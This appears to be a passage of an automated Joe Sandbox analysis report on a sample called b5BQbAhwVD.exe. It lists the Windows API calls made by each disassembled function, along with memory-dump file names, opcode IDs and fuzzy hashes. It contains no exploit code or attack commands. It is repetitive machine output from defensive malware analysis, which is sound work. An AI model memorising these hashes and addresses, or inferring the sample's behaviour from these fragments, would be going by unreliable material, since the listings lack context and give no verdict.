                                                                                                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                  • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                                  • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                  • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                                  APIs
                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,72ED123B,?,72ED12DF,00000019,72ED11BE,-000000A0), ref: 72ED1225
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocGlobal
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761449716-0
                                                                                                                  • Opcode ID: 7d5a07d747e45d972ecd7faca3109f0664a67763ae2306e23233f1d0b1367a79
                                                                                                                  • Instruction ID: c4222cd2a7ace80280a08f3ebd8bc69f0726e7a33d5b652a953f092a5dcb506f
                                                                                                                  • Opcode Fuzzy Hash: 7d5a07d747e45d972ecd7faca3109f0664a67763ae2306e23233f1d0b1367a79
                                                                                                                  • Instruction Fuzzy Hash: 4EB01276A80000DFEF009B65DD46F34325CE700301FD44444F600C0180C12048408A35
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                    • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                  • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                  • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                  • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                  • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                  • CloseClipboard.USER32 ref: 00405912
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                  • String ID: (7B${
                                                                                                                  • API String ID: 590372296-525222780
                                                                                                                  • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                                  • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                                  • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                                  • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                  • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                    • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                    • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                    • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                    • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                    • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                  • String ID: (7B$A$C:\Users\user\AppData\Local\Iw$Call
                                                                                                                  • API String ID: 2624150263-819140515
                                                                                                                  • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                                  • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                                  • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                                  • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 72ED121B: GlobalAlloc.KERNELBASE(00000040,?,72ED123B,?,72ED12DF,00000019,72ED11BE,-000000A0), ref: 72ED1225
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 72ED1C6B
                                                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 72ED1CB3
                                                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 72ED1CBD
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 72ED1CD0
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 72ED1DB2
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 72ED1DB7
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 72ED1DBC
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 72ED1FA6
                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 72ED2140
                                                                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 72ED21B5
                                                                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 72ED21C6
                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 72ED2220
                                                                                                                  • lstrlenW.KERNEL32(00000808), ref: 72ED223A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 245916457-0
                                                                                                                  • Opcode ID: dfa2eb3cb59eb63eeb4df86968e9e8687bf6cca2672b5e2e279399cf23d9aa0f
                                                                                                                  • Instruction ID: 22b524e4698a7c3d18bf1479a857ef78d1f66dbc36d1c575436bfc0c02540750
                                                                                                                  • Opcode Fuzzy Hash: dfa2eb3cb59eb63eeb4df86968e9e8687bf6cca2672b5e2e279399cf23d9aa0f
                                                                                                                  • Instruction Fuzzy Hash: 47227A71D04206DBCB158FB8C9847EEBBB5FF05309F50D52EE1A6EA184D7B05A82CB50
                                                                                                                  APIs
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 00406851
                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 00406865
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressByteCharMultiProcWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2508298434-0
                                                                                                                  • Opcode ID: c37da8da378c18353bec7fc648a57738bb32c6c86a1d9b06a84ce83886780411
                                                                                                                  • Instruction ID: e5ebb041b93c27b5bb64d203231611adad9cd2ad275d9b301639073104c6c5cb
                                                                                                                  • Opcode Fuzzy Hash: c37da8da378c18353bec7fc648a57738bb32c6c86a1d9b06a84ce83886780411
                                                                                                                  • Instruction Fuzzy Hash: C4E08672100104BEEB026F71DD09FF7376CEB14310F1086757992E01D0EAB4DE54CA68
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateInstance
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 542301482-0
                                                                                                                  • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                                  • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                                  • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                                  • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1974802433-0
                                                                                                                  • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                                  • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                                  • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                                  • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                                  APIs
                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                  • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                  • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                  • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                  • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                  • String ID: Call$N
                                                                                                                  • API String ID: 3103080414-3438112850
                                                                                                                  • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                  • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                                  • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                  • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                                  APIs
                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                  • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                  • String ID: F
                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                  • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                  • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                  • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                  • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                  • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                    • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                    • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                  • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                                  • wsprintfA.USER32 ref: 004060B3
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
